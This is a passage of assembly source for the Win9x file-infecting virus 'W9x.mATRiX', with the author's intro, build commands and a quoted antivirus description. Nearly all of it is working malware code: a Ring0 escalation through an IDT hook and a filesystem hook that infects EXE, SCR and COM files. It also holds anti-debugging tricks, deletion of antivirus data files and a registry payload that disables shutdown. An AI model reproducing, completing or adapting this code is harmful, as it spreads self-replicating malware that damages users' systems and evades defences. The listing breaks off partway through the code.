comment                                                                           ÿ

released

ú ÄÍÄÍÍÍÍÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄúÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÍÍÍÄÍÄ ú
             ÜÜÜÜÜ                                           °
    ÛÛÛÛ   °  ßßßß ÛÛÛÛßÛÛÛ ÛÛÛÛßÛÛÛÛ ÛÛÛÛ   ÛÛÛÛþßßßß ÛÛÛÛßÛÛÛÛ ÛÛÛÛßÛÛÛÛ2000
  ° ²ÛÛÛ °    ÛÛÛÛ ²ÛÛÛÜ  ° ÛÛÛÛþ     ÛÛÛÛ ° ²ÛÛÛ ÛÛÛÛ ÛÛÛÛ  °   ²ÛÛÛþ     °
°°°°²ÛÛÛ°ÛÛÛÛ°²ÛÛÛ°ÛÛÛÛ°°°°°ÛÛÛÛ°ÛÛÛÛ°²ÛÛÛ°Û°ÛÛÛÛ°²ÛÛÛ°²ÛÛÛ°°°°°°²ÛÛÛ°ÛÛÛÛ° °°
  ° ²ÛÛÛÜÛÛÛÛܲÛÛÛ ²ÛÛÛ  °  ²ÛÛÛÜÛÛÛÛ ²ÛÛÛÜÛÜÛÛÛÛ ²²ÛÛܲÛÛÛ  °  °²ÛÛÛÜÛÛÛÛ[LW]
                ßßßßßßß                                             °
        W9x.mATRiX.size by LiFEwiRE [ShadowVX] - www.shadowvx.org


        Intro

        This virus is my first windows virus, and the result of reading some
        docs, tutorial and (Ring0 virus)-sources.

        It is not a very complicated virus, and it doesn't use new technics
        too... Maybe the ASCII counter is some unusual feature.

        When debugging is enabled, this things are extra:

        Unload when dword at bff70400 <> 0h
        Beep at certain events (get resident, unload & infect)
        Beep can be turned off by changing byte ptr at bff70408 <> 0h
        only infects files at your D: drive (it's my test drive)

        I use WinIce to modify the values.

        Specs:

        Ring0 resident, infects on IFSmgr file rename, open and attrib, EXE,
        SCR and COM (!) files. Com files are infected for the payload, a scene
        from The Matrix. The COM files are not really infected, but some date
        checking code and action is appended on it. When the month is equal
        to the date the payload will start.

        Infection  : Increasing last section, and make a jump at orignal
                     entrypoint to it (when modifying EP to last section
                     AVPM will popup:( )

        Encryption : XOR'd and polymorfic-build-up-decryptors.
        Armour     : Anti debugger & anti emulator (SEH & Anti-SoftICE)

        Payload(s) : 2, as i said above 1 which is appended to all .com files
                     on opening and c:\windows\win.com which will display
                     'Wake up Neo... / The Matrix has you... / w9x.mATRiX'
                     like in the movie (except the last sentence, w9x.mATRiX:)
                     when the day is equal to the month (1 jan, 2 feb,etc.)

                     the other payload will remove the shutdown command from
                     the start menu using the registery - at 06 april.

        KnownBugs :  No I know... I tested this code a lot, and a friend of me
                  :  infected his own PC accidently and it worked really good
                     :)... The only problem is that F-prot hangs on infected
                     files... hehe but that's not my problem :)

        Thanx  to : Lord Julus, Billy Belcebu & Z0MBiE.

        Greets to : Ruzz', Kamaileon, z3r0, Bhunji, Dageshi, all other Shadow-
                    VX members,                        
                    r-, GigaByte, VirusBuster, CyberYoda, T00fic, all other
                    people i met on #virus & #vir, and 29A & iKX for their
                    nice magazines.

                    and some non-virus greets:

                    Ghostie :P, Hampy, nog wat XXXClan'ers, DJ Accelerator,
                    King Smozzeboss SMOS from Conehead SMOS games [NL1SMS]
                    PiepPiep, NL0JBL, BlueLIVE, MisterE & Xistence.

        Compile:    Tasm32 /m3 /ml LiFEwiRE.ASM,
                    tlink32 /Tpe /aa /c LiFEwiRE.OBJ,,,import32.lib
                    pewrsec LiFEwiRE.EXE

        Contact:    Lifewire@mail.ru


úÄÍÄÍÍÍÍÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄúÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÍÍÍÄÍÄ ú   ÿ

Description at www.viruslist.com

Win95.Matrix


It is not a dangerous memory resident polymorphic parasitic Win9x virus. It
stays in the Windows memory as a device driver (VxD) by switching from
application mode to Windows kernel (Ring3->Ring0), hooks disk files access
functions, and infect PE executable files with EXE and SCR file name
extensions, and affects DOS COM files.

While infecting a PE EXE file the virus encrypts itself and writes to the
file end. The virus also patches program's startup code with a short routine
that passes control to main virus code.

While affecting DOS COM files the virus writes to the end of file a short
routine that has no infection abilities, but just displays a message on
July 7th:

 Wake up, Neo...
 The Matrix has you...
 w9x.mATRiX

The virus also affects the C:\WINDOWS\WIN.COM file in the same way.

On April 6th the virus modifies the system registry key:

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer NoClose = 1

As the result of this key a user cannot switch off the computer.

The virus also deletes anti-virus data files: AVP.CRC, ANTI-VIR.DAT, IVB.NTZ,
CHKLIST.MS.

The virus contains the text strings:

[- comment from LiFEwiRE- AV'ers forgot to put the strings here??]

where 'xxxxxxx' is the virus' "generation" number.


úÄÍÄÍÍÍÍÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄúÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÍÍÍÄÍÄ ú   ÿ

.486p
.model flat
locals
jumps

        extrn ExitProcess:PROC;                 ;only 4 first gen.

;----- -[Equ's]- ------------------------------------------------------------;

debug           equ     1                       ;test/debug version?

virusz          equ     offset end - offset start
sectionflags    equ     00000020h or 80000000h or 20000000h

if debug eq 1
inthook         equ     05h                     ;let's hook this int for ring0
 else
inthook         equ     03h                     ;let's hook this int for ring0
 endif
 
JmpToCodesz     equ     offset EndJmpToCode-offset JmpToCode

IFSMgr                   equ     0040h          ;for VxDCall
InstallFileSystemApiHook equ     067h           ;used in ring0 hooker
UniToBCSPath             equ     041h           ;used in hook to convert uni2ansi
Ring0_FileIO             equ     032h           ;for all file i/o

IFSFN_FILEATTRIB         equ     21h            ;hooked functions
IFSFN_OPEN               equ     24h
IFSFN_RENAME             equ     25h

R0_OPENCREATFILE         equ     0D500h         ;used with ring0_fileIO
R0_CLOSEFILE             equ     0D700h
R0_WRITEFILE             equ     0D601h
R0_READFILE              equ     0D600h
R0_GETFILESIZE           equ     0D800h
R0_FILEATTRIBUTES        equ     04300h
GET_ATTRIBUTES           equ     00h
SET_ATTRIBUTES           equ     01h
R0_DELETEFILE            equ     04100h

PC_STATIC                equ     20000000h      ;for allocating pages
PC_WRITEABLE             equ     00020000h      ;and protecting them from
PC_USER                  equ     00040000h      ;ring3 code
PAGEZEROINIT             equ     00000001h
PAGEFIXED                equ     00000008h
PG_SYS                   equ     1

Get_DDB                  equ     0146h          ;VMMCall to find S-ICE

PageAllocate             equ     0053h
PageModifyPermissions    equ     0133h

SizeInPages              equ     (virusz+1000 + 4095) / 4096


RegOpenKey               equ     0148h          ;used by payload for registery
RegSetValueEx            equ     0152h          ;modifying
HKEY_CURRENT_USER        equ     80000001h      ;
REG_DWORD                equ     4              ;


debug_beep_FREQ          equ     1700           ;for debugging
debug_beep_DELAY         equ     50*65536

debug_beep_FREQ2         equ     700           ;for debugging
debug_beep_DELAY2        equ     100*65536

;----- -[Macro's]- ----------------------------------------------------------;

VxDCall macro   vxd_id, service_id
        int     20h
        dw      service_id
        dw      vxd_id
        endm

VMMCall macro   service_id                      ;Is just less work than doing
        int     20h                             ;a VxDCall VMM, service
        dw      service_id
        dw      0001h
        endm

if debug eq 1
;        display "Debug Version"
        else
        display " °±²Û *Warning* This is the real version of the virus Û²±°"
endif

;----- -[Code]- -------------------------------------------------------------;
_CODE   segment dword use32 public 'CODE'

start:
        pushad

        call    getdelta
getdelta:
        pop     ebp
        sub     ebp,offset getdelta

        sub     eax,00001000h                   ;Get imagebase at runtime
newEIP  equ     $-4

        mov     dword ptr [imagebase+ebp],eax

        pushad

        call    setupSEHandKillEmu              ;The call pushes the offset

        mov     esp,[esp+8]                     ;Error gives us old ESP                          
        jmp     backtocode

setupSEHandKillEmu:
        xor     edx,edx                         ;fs:[edx] = smaller then fs:[0]
        push    dword ptr fs:[edx]              ;Push original SEH handler
        mov     fs:[edx],esp                    ;And put the new one (located
        dec     byte ptr cs:[edx]               ;make error & let our SEH take
                                                ;control (not nice 4 emu's:)
backtocode:

        pop     dword ptr fs:[0]
        pop     edx                             ;pops EIP pushed by call setupSEH

        popad

        call    SetupSEH                        ;to kill errors

        ;if eip gets here an error has occured        

        mov     esp,[esp+8]                     ;contains old ESP

        jmp     RestoreSEH                      ;...

SetupSEH:
        xor     edx,edx                         ;we are save now, if an error
        push    dword ptr fs:[edx]              ;occure EIP will be at the
        mov     fs:[edx],esp                    ;code after SetupSEH

        push    edx
        sidt    fword ptr [esp-2]               ;'push' int table
        pop     edx                             ;restore stack from call and
                                                ;edx contains pointer to IDT

        add     edx,(inthook*8)+4               ;Get int vector

        mov     ebx,dword ptr [edx]
        mov     bx,word ptr [edx-4]             

        lea     edi,dword ptr [ebp+Inthandler]  ;routine to let int point to

        mov     word ptr [edx-4],di
        shr     edi,16                          ;high/low word
        mov     word ptr [edx+2],di

        int     inthook                         ;call int, int will be ring0!

        mov     word ptr [edx-4],bx             ;Restore old interrupt values
        shr     ebx,16
        mov     word ptr [edx+2],bx


RestoreSEH:

        xor     edx,edx
        pop     dword ptr fs:[edx]
        pop     edx                             ;pops offset pushed by CALL

        mov     edi,dword ptr [imagebase+ebp]   ;--- Restore old bytes ---;
        add     edi,dword ptr [base+ebp]        ;do at it ring0 to avoid
                                                ;page errorz
        lea     esi,[offset oldbytes+ebp]
        mov     ecx,JmpToCodesz
        rep     movsb                           ;restore bytes from host

        popad
        
        mov     eax,00h                         ;--- return to host ---;
imagebase       equ     $-4
        add     eax,offset host -0400000h       ;1st gen
base    equ     $-4

        push    eax
        ret

;----------------------------------------------------------------------------;
;       ****    RING0 LOADER    ****
;----------------------------------------------------------------------------;
Inthandler:
        pushad

        mov     eax,0bff70404h                  ;already loaded?
        cmp     dword ptr [eax],eax
        je      back2ring3
        mov     dword ptr [eax],eax

        push    PAGEFIXED + PAGEZEROINIT
        xor     eax, eax
        push    eax                             ;PhysAddr
        push    eax                             ;maxPhys
        push    eax                             ;minPhys
        push    eax                             ;Align
        push    eax                             ;handle of VM = 0 if PG_SYS
        push    PG_SYS                          ;allocate memory in system area
        push    SizeInPages*2                   ;nPages
VxD1V   equ     00010053h
VxD1:   VMMCall PageAllocate
        add     esp, 8*4

        or      eax,eax                         ;eax = place in mem
        jz      back2ring3                      ;if zero error :(

        mov     edi,eax                         ;set (e)destination

        push    eax

        push    edi
        lea     esi,[offset start+ebp]          ;set source
        mov     ecx,virusz                      ;virussize
        cld                                     ;you never know with poly :)
rep     movsb                                   ;copy virus to allocated mem
        pop     edi

        mov     dword ptr [edi+delta-start],edi

        lea     ecx,[edi+offset hook-offset start]           ;Install FileSystem Hook
        push    ecx
VxD2V   equ     InstallFileSystemApiHook+256*256*IFSMgr
VxD2:   VxDCall IFSMgr,InstallFileSystemApiHook
        pop     ecx

        mov     [edi+nexthook-start],eax

        pop     eax
        
        push    PC_STATIC                             
        push    020060000h                      ;new paging settings
        push    SizeInPages*2
        shr     eax, 12
        push    eax
VxD5V   equ     00010133h
VxD5:   VMMCall PageModifyPermissions
        add     esp, 4*4


        call    CheckThePayloadDate             ;(and mayB do something:)

if debug eq 1
        call    debug_beep2
endif

back2ring3:

if debug eq 1
        call    debug_beep
endif

        popad
        iretd                                   ;exit int (to ring3!)
;----------------------------------------------------------------------------;

host:
oldbytes:
        Push    0
        Call    ExitProcess
        db      JmpToCodesz-5 dup (176d)

;----------------------------------------------------------------------------;
;       ****    FILESYSTEM HOOK  ****
;----------------------------------------------------------------------------;

hook:
	push	ebp
	mov	ebp,esp

	sub	esp,20h

	push	ebx
	push	esi
	push	edi

        db      0bfh                            ;mov edi,DeltaInMem
delta   dd      0

        cmp     dword ptr [busy-start+edi],not "BuSY"     ;...are we busy?
        je      back

if debug eq 1
        cmp     dword ptr [death-start+edi],'TRUE'
        je      back
endif

        mov     eax,dword ptr [ebp+0Ch]         ;EAX = Function
        not     eax

        cmp     eax,not IFSFN_OPEN              ;File Open? try it
        jz      infect

        cmp     eax,not IFSFN_RENAME            ;Rename? try it
        jz      infect

        cmp     eax,not IFSFN_FILEATTRIB        ;File Attributes? try it
        jz      infect

back:
        mov     eax,[ebp+28]         ; call the old
	push	eax
	mov	eax,[ebp+24]
	push	eax
	mov	eax,[ebp+20]
	push	eax
	mov	eax,[ebp+16]
	push	eax
	mov	eax,[ebp+12]
	push	eax
	mov	eax,[ebp+8]
	push	eax

	db	0b8h
nexthook dd 0
	call	[eax]

	add	esp,6*4

	pop	edi
	pop	esi
	pop	ebx

	leave
	ret
        
;----------------------------------------------------------------------------;
;       ****    SOME CHECKS BEFORE INFECTING    ****
;----------------------------------------------------------------------------;

infect:
        pushad

if debug eq 1
        mov     eax,0bff70400h
        mov     eax,dword ptr [eax]
        or      eax,eax
        jz      stayalive                       ;kill ourself?

        mov     dword ptr [edi+death-start],'TRUE'

        call    debug_beep
        call    debug_beep2
        call    debug_beep2
        call    debug_beep2
        call    debug_beep

        mov     eax,0bff70400h

        xor     edx,edx
        mov     dword ptr [eax],edx
        mov     dword ptr [eax+4],edx

stayalive:

endif

        mov     dword ptr [busy-start+edi],not 'BuSY'

        lea     esi, [edi+filename-start]       ;file buffer

        mov     eax, dword ptr [ebp+16]
        cmp     al,0ffh                         ;no drive defined?
        je      nopath
        add     al,40h                          ;a=1,b=2,a+40h='A',b+40h='B'
        mov     byte ptr [esi],al
        mov     word ptr [esi+1],':'
        add     esi,2
nopath:
        xor     eax,eax
        push    eax   ;push 0                   ;BCS/WANSI
        inc     ah                              ;ax=100h
        push    eax   ;push 100h                ;buf size
        mov     eax,[ebp+28]
        mov     eax,[eax+12]
        add     eax,4
        push    eax                             ;filename
        push    esi                             ;destination (buffer)

VxD3V   equ     UniToBCSPath+256*256*IFSMgr
VxD3:   VxDCall IFSMgr, UniToBCSPath            ;Convert to ASCII

        add     esp,4*4                         ;restore stack
        add     esi,eax                         ;eax = lenght
        mov     byte ptr [esi],0                ;make ASCIIZ

        mov     eax,dword ptr [esi-4]

        not     eax                             ;
        cmp     eax,not 'EXE.'                  ;normal exe?
        je      infectit

        cmp     eax,not 'RCS.'                  ;screensaver?
        je      infectit

        cmp     eax,not 'MOC.'                  ;a com? (indeed !!:)
        jne     nocomfile 
        jmp     payloadinfector
nocomfile:

quitinfect:

        mov     dword ptr [busy-start+edi],eax  ;hope eax <> 'busy' :)
        popad

        jmp     back

db      "<w9x.mATRiX."
db      virusz/1000 mod 10+'0'
db      virusz/0100 mod 10+'0'
db      virusz/0010 mod 10+'0'
db      virusz/0001 mod 10+'0',"."
counter db      "0001086 & MyLittlePoly."       ;enough space for counter :)
db      polysz/1000 mod 10+'0'
db      polysz/0100 mod 10+'0'
db      polysz/0010 mod 10+'0'
db      polysz/0001 mod 10+'0'

if debug eq 1
db      " Debug Version"
endif

db      " by LiFEwiRE [sHAD0WvX]>"



dontinfect:     ;when attrs. were already modified
        pop     esi                             ;get attribs + 1 = set
        pop     ecx                             ;old attrs
        pop     eax                             ;pointer to buffer with filen.
        call    R0_FileIO                       ;RESTORE ATTRIBUTES
        jmp     quitinfect


cryptkey        dd      0
cryptkey2       dw      0

;----------------------------------------------------------------------------;
;       ****    REAL PE INFECTION PART  ****
;----------------------------------------------------------------------------;

infectit:

        lea     esi, [edi+filename-start]

        call    checkname
        jc      quitinfect                      ;if name = bad

if debug eq 1
        cmp     word ptr [esi],":D"
        jne     quitinfect
endif

        mov     eax,R0_FILEATTRIBUTES + GET_ATTRIBUTES
        push    eax
        call    R0_FileIO

        pop     eax
        inc     eax                             ;eax=4300+1 = set
        push    eax
        push    ecx                             ;save attribs
        push    esi                             ;and esi,no new LEA needed
        xor     ecx,ecx                         ;new attr
        call    R0_FileIO
        
        xor     ecx,ecx                         ;ecx=0
        mov     edx,ecx                         ;
        inc     edx                             ;edx=1
        mov     ebx,edx                         ;
        inc     ebx                             ;ebx=2
        mov     eax,R0_OPENCREATFILE
        call    R0_FileIO
        jc      dontinfect

        mov     ebx,eax                         ;file handle

        lea     esi,[edi+pointertope-start]     ;read pointer to PE at 3ch
        mov     ecx,4                           ;into pointertope
        mov     edx,03ch
        mov     eax,R0_READFILE
        call    R0_FileIO

        lea     esi,[edi+peheader-start]        ;peheader buffer
        mov     ecx,1024                        ;1024 bytes
        mov     edx,dword ptr [edi+pointertope-start] ;pointer to pe header
        mov     eax,R0_READFILE                 ;...
        call    R0_FileIO

        cmp     word ptr [esi],'EP'             ;is pe?
        jne     nope                            ;nope, its noPE :)

        mov     eax,0badc0deh                   ;already infected?
        cmp     dword ptr [esi+4ch],eax         ;4ch = reserved
        je      nope
        mov     dword ptr [esi+4ch],eax

        push    ebp
        push    edi
        push    ebx                             ;save handle for after calcs.

        mov     ebp,edi

        mov     edi,esi
        add     esi,18h                         ;esi+18h=start of OptionalHeader
        add     si,word ptr [esi+14h-18h]       ;esi-4 = pe/0/0+14h = size OH
                                                ;optionalheader+size=allocation table

        ;edi = PE/0/0, esi = allocation table

        push    esi
        xor     ecx,ecx
        mov     cx,word ptr [edi+6]             ;put in ecx nr. of sections
        xor     eax,eax                         ;startvalue of eax
        push    cx                              ;
sectionsearch:
        cmp     dword ptr [esi+14h],eax         ;is it the highest?
        jb      lower                           ;no
        mov     ebx,ecx                         ;remember section nr.
        mov     eax,dword ptr [esi+14h]         ;and remember value
lower:
        add     esi,28h                         ;steps of 28h
        loop    sectionsearch
        pop     cx

        sub     ecx,ebx

        mov     eax,28h                         ;multiply with section length
        mul     ecx
        pop     esi
        add     esi,eax                         ;esi points now to section header

;    Section header layout, Tdump names things other (4 example rawdata)
;
;esi+0h      8h      Section's name (.reloc, .idata, .LiFEwiRE)
;    8h      4h      VirtualSize
;    0ch     4h      RelativeVirtualAdress
;    10h     4h      SizeOfRawData
;    14h     4h      PointerToRawData
;    18h     4h      PointerToRelocations
;    1ch     4h      PointerToLinenumbers
;    20h     2h      NumberOfRelocations
;    22h     2h      NumberOfLinenumbers
;    24h     4h      Characteristics


;       ESI points to Section header, EDI points to PE

        or      [esi+24h],sectionflags          ; Update section's flagz

        mov     edx,[esi+10h]                   ; EDX = SizeOfRawData
        mov     eax,edx                         ; EAX = SizeOfRawData
        add     edx,[esi+0Ch]                   ; EDX = New EIP
        add     eax,[esi+14h]                   ; EAX = Where append virus
        push    eax                             ; Save it

        push    esi

        add     eax,[esi+0Ch]
        mov     [edi+50h],eax

        mov     eax,[edi+28h]                           ;backup entry RVA
        mov     dword ptr [ebp+base-start],eax          ;...
        mov     dword ptr [ebp+newEIP-start],edx        ;save it

        add     edx,dword ptr [edi+34h]         ;edx=neweip+imagebase

        mov     dword ptr [ebp+distance-start],edx  ; Store the address

        mov     esi,edi
        add     esi,18h                         ;esi+18h=start of OptionalHeader
        add     si,word ptr [esi+14h-18h]       ;esi-4 = pe/0/0+14h = size OH

        ;ESI points to the allocation table,EDI to PE

        ;lets find the section which contains the RVA.

        ;then the place where to put the jump is entry-rva+phys.

        sub     esi,28h


look:   add     esi,28h
        mov     edx,eax                         ;Old EntryPoint (RVA)
        sub     edx,dword ptr [esi+0Ch]         ;VirtualAddres
        cmp     edx,dword ptr [esi+08h]         ;VirtualSize
        jae     look 

        sub     eax,dword ptr [esi+0ch]         ;sub RVA
        add     eax,dword ptr [esi+14h]         ;add PhysicalOffset
                                                ;EAX is now the PhysicalOffset
                                                ;of the EntryPoint

        or      [esi+24h],sectionflags          ; Update section's flagz

        pop     esi
        pop     edx
        pop     ebx

        push    edx                             ;
        push    esi
        push    eax

        lea     esi,[ebp+oldbytes-start]        ;read pointer to PE at 3ch
        mov     ecx,JmpToCodesz                 ;into pointertope
        mov     edx,eax
        mov     eax,R0_READFILE
        call    R0_FileIO

        mov     word ptr [ebp+randombla-start],ax       ;random value

        pop     edx                             ;and write new bytes at entry
        lea     esi,[ebp+JmpToCode-start]       ;point to make code jmp to
        mov     eax,R0_WRITEFILE                ;the section which contains
        mov     ecx,JmpToCodesz                 ;the viruscode (modifying the
        call    R0_FileIO                       ;entry RVA will alert AV's)

        call    VxDPatch                        ;unpatch VxDCalls (and VMM)

        call    IncCounter                      ;a ASCII counter rules

        call    encrypt                         ;encrypt,createpoly,returnsize (in ecx)
                 
        ;encrypt-^ returns the virus size in ecx

        mov     eax,ecx
        mov     ecx,[edi+3Ch]                   ;ECX = Alignment
        push    edx                             ; Align
        xor     edx,edx
        push    eax
        div     ecx
        pop     eax
        sub     ecx,edx
        add     eax,ecx
        pop     edx
        mov     ecx,eax                         ;aligned size to append

        pop     esi

        add     [esi+10h],eax                   ; Size of rawdata
        mov     eax,[esi+10h]                   ; 
        add     [esi+08h],eax                   ; & virtual size

        pop     edx
        push    edi
        lea     esi,[ebp+viruscopy-start]       ;polymorfer returns size in 
        mov     eax,R0_WRITEFILE                ;the ECX register
        push    eax
        call    R0_FileIO                       ;append virus

        pop     eax
        pop     esi
        mov     ecx,1024
        mov     edx,[ebp+pointertope-start]
        call    R0_FileIO                       ;overwrite PE header


        pop     edi
        pop     ebp

nope:
        mov     eax,R0_CLOSEFILE
        call    R0_FileIO

if debug eq 1
        call    debug_beep
endif

        call    killAVfiles
        call    infectwindotcom                 ;for payload

        jmp     dontinfect

windotcom       db      "C:\WINDOWS\WIN.COM",0h                 ;for payload
sizewdc         equ     $-offset windotcom

avpcrc          db      9,"AVP.CRC",0h
antivirdat      db      14,"ANTI-VIR.DAT",0h
ivbntz          db      9,"IVB.NTZ",0h
chklistms       db      12,"CHKLIST.MS",0h

killAVfiles:
        pushad
                                ;first add the path to the filename
        mov     ebp,edi

        lea     edx,[offset avpcrc-start+ebp]

        mov     ecx,4
killing:
        call    killthisfile
        xor     ebx,ebx
        mov     bl,byte ptr [edx]
        add     edx,ebx
        loop    killing

        popad

        ret


killthisfile:
        pushad
        lea     edi,[offset filename-start+ebp]
        push    edi

        mov     al,'.'
        cld
        scasb           ;search from left to right for the dot
        jne     $-1

        std
        mov     al,'\'  ;search from right to left for the \
        scasb
        jne     $-1

        xor     ecx,ecx

        inc     edi     ;edi pointed to char before \
        inc     edi     ;edi pointed to \

        cld
        
        mov     esi,edx
        lodsb
        mov     cl,al
rep     movsb

        pop     esi
        mov     eax,R0_DELETEFILE
        mov     ecx,2027h
        call    R0_FileIO
        popad
        ret

;--------------------------------------------------------------------------
;       ****    MODIFIES COM FILES FOR PAYLOAD, SPECIAL FOR WIN.COM     ***
;--------------------------------------------------------------------------

infectwindotcomflag     db      0h

infectwindotcom:                                ;called if virus is not resident
        pushad
        mov     byte ptr [edi+offset infectwindotcomflag-start],'!'

        push    edi

        lea     esi,[offset windotcom-start+edi]
        lea     edi,[offset filename-start+edi]
        mov     ecx,sizewdc
        cld
rep     movsb

        pop     edi

        jmp     payloadinfector

backfrominfecting:

        mov     byte ptr [edi+offset infectwindotcomflag-start],173d ;­
        popad            
        ret

;--------------------------------------------------------------------------

jmpop   dw      0e990h                          ;nop & jmp
jmpval  dw      ?


;--------------------------------------------------------------------------

payloadinfector:
if debug eq 1
        cmp     dword ptr [esi-8],'PRUB'        ;*BURP.COM ?
        jne     wegvancom
endif

        lea     esi, [edi+filename-start]
        
        xor     ecx,ecx                         ;ecx=0
        mov     edx,ecx                         ;
        inc     edx                             ;edx=1
        mov     ebx,edx                         ;
        inc     ebx                             ;ebx=2
        mov     eax,R0_OPENCREATFILE
        call    R0_FileIO
        jc      wegvancom

        mov     ebx,eax                         ;file handle

        lea     esi,[edi+first4bts-start]       ;read first 4 bytes
        mov     ecx,4
        xor     edx,edx
        mov     eax,R0_READFILE
        call    R0_FileIO

        cmp     word ptr [edi+first4bts-start],'ZM'     ;a renamed EXE ??
        je      closecomfile

        cmp     word ptr [edi+first4bts-start],0e990h   ;already infected?
        je      closecomfile
        
        mov     eax,R0_GETFILESIZE
        call    R0_FileIO                       ;get it's size

        cmp     eax,0ffffh-0100h-dospayloadsize ;infectable?
        ja      closecomfile

        push    eax

        sub     eax,4
        mov     word ptr [edi+jmpval-start],ax    ;distance to jmp

        lea     esi,[edi+offset jmpop-start]    ;Write new jMP at 0h
        mov     eax,R0_WRITEFILE
        mov     ecx,4
        xor     edx,edx
        push    eax
        call    R0_FileIO

        pop     eax
        pop     edx                             ;place to append
        push    edx
        lea     esi,[edi+offset dospayload-start]
        mov     ecx,dospayloadsize
        call    R0_FileIO

        pop     edx                          ;read 7 bytes before the end
        push    edx
        sub     edx,7
        mov     ecx,7
        mov     eax,R0_READFILE
        lea     esi,[edi+offset filename-start] ;just a buffer
        call    R0_FileIO

        pop     edx

        cmp     word ptr [edi+offset filename-start+3],'SN' ;ENUNS? (ENU is
        jne     closecomfile                                ;optional)

        add     word ptr [edi+offset filename-start+5],dospayloadsize+7

        mov     ecx,7

        lea     esi,[edi+offset filename-start]
        mov     eax,R0_WRITEFILE
        add     edx,dospayloadsize
        call    R0_FileIO                       ;append updated ENUNS 

closecomfile:
        mov     eax,R0_CLOSEFILE
        call    R0_FileIO

wegvancom:

if debug eq 1
        call    debug_beep
endif

        cmp     byte ptr [edi+offset infectwindotcomflag-start],'!'
        je      backfrominfecting

        jmp     quitinfect

;--------------------------------------------------------------------------



;--------------------------------------------------------------------------
;       ***     BEEPS used if debug equ 1                               ***
;--------------------------------------------------------------------------


if debug eq 1
debug_beep:
        push    eax
        push    ecx        

        mov     eax,0bff70408h
        cmp     byte ptr [eax],0
        jne     geenirritantgebiepvandaag

        mov     al, 0B6h
        out     43h, al

        mov     al, (12345678h/debug_beep_FREQ) and 255
        out     42h, al
        mov     al, ((12345678h/debug_beep_FREQ) shr 16) and 255
        out     42h, al

        in      al, 61h
        or      al, 3
        out     61h, al

        mov     ecx, debug_beep_DELAY
        loop    $

        in      al, 61h
        and     al, not 3
        out     61h, al

        pop     ecx
        pop     eax
        ret

debug_beep2:
        push    eax
        push    ecx        

        mov     al, 0B6h
        out     43h, al

        mov     al, (12345678h/debug_beep_FREQ2) and 255
        out     42h, al
        mov     al, ((12345678h/debug_beep_FREQ2) shr 16) and 255
        out     42h, al

        in      al, 61h
        or      al, 3
        out     61h, al

        mov     ecx, debug_beep_DELAY2
        loop    $

        in      al, 61h
        and     al, not 3
        out     61h, al

geenirritantgebiepvandaag:      ;blaa dit versta jij toch niet looser :P

        pop     ecx
        pop     eax
        ret
endif


;--------------------------------------------------------------------------
;       File IO function, called lot of times, better for patching callback
;--------------------------------------------------------------------------

R0_FileIO:
VxD4V   equ     Ring0_FileIO+256*256*IFSMgr
VxD4:   VxDCall IFSMgr, Ring0_FileIO
        ret

;--------------------------------------------------------------------------



;--------------------------------------------------------------------------
;       Increases the ASCII counter of infections
;--------------------------------------------------------------------------

IncCounter:             ;counts a ASCII counter... when there are more than
                        ;9999999 files infected it contains a bug, but i don't
        lea     esi,[offset counter-start+6+ebp] ;expect that from this vir :)

next:
        inc     byte ptr [esi]
        cmp     byte ptr [esi],'9'+1
        jb      ok
        mov     byte ptr [esi],'0'        
        dec     esi
        jmp     next
ok:
        ret


;--------------------------------------------------------------------------

;------------------------------------------------------------------------------
;       Some things used in the registery payload
;------------------------------------------------------------------------------

KeyOfPolicies   db      "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer",0h
valuename1      db      "NoClose",0h            ;no shutdown :)
ValueToSet      dd      1h


CheckThePayloadDate:

        mov     al,07h                          ;Get day
        out     70h,al                          ;(returns it in hex btw!)
        in      al,71h

        cmp     al,06h                          ;Is it 6th?
        jnz     noPayload
        
        mov     al,08h                          ;Get month
        out     70h,al                          ;(returns it in hex btw!)
        in      al,71h

        cmp     al,04h                          ;Is it 4th?
        jnz     noPayload                       ;(

        lea     eax,[offset pointertope+ebp]    ;just a buffer
        push    eax
        lea     eax,[offset KeyOfPolicies+ebp]  ;open this key
        push    eax
        push    HKEY_CURRENT_USER               ;
VxD6V   equ     RegOpenKey+256*256*1
VxD6:   VMMCall RegOpenKey
                                                
        add     esp,3*4                         ;reset stackpointer

        push    4                               ;length of value
        lea     eax,[offset ValueToSet+ebp]     ;set value true
        push    eax
        push    REG_DWORD                       ;type
        push    0                               ;reserved
        lea     eax,[offset valuename1+ebp]
        push    eax
        push    [pointertope+ebp]               ;handle
VxD7V   equ     RegSetValueEx+256*256*1         ;1 = VMM
VxD7:   VMMCall RegSetValueEx

        add     esp,6*4

noPayload:
        ret


;--------------------------------------------------------------------------


;--------------------------------------------------------------------------
;       Patches the VxDCalls (on execute windows modifies them to a real call)
;--------------------------------------------------------------------------

VxDPatch:
        pushad
        mov     bx,020cdh       ;int 20 used by VxDCall

        mov     word ptr [VxD1-start+ebp],bx            ;int 20
        mov     dword ptr [VxD1-start+ebp+2],VxD1V      ;dd with IFSMGR & fn.

        mov     word ptr [VxD2-start+ebp],bx
        mov     dword ptr [VxD2-start+ebp+2],VxD2V

        mov     word ptr [VxD3-start+ebp],bx
        mov     dword ptr [VxD3-start+ebp+2],VxD3V

        mov     word ptr [VxD4-start+ebp],bx
        mov     dword ptr [VxD4-start+ebp+2],VxD4V

        mov     word ptr [VxD5-start+ebp],bx
        mov     dword ptr [VxD5-start+ebp+2],VxD5V
        
        mov     word ptr [VxD6-start+ebp],bx
        mov     dword ptr [VxD6-start+ebp+2],VxD6V
        
        mov     word ptr [VxD7-start+ebp],bx
        mov     dword ptr [VxD7-start+ebp+2],VxD7V
        
        popad
        ret

;--------------------------------------------------------------------------


rnd32_seed      dd      0h


;------ this code is putted at EIP of host and jmps to virus code -----------;
JmpToCode:
        stc
        db      066h,0fh,083h           ;jnc 
randombla       dw      ?               ;some place
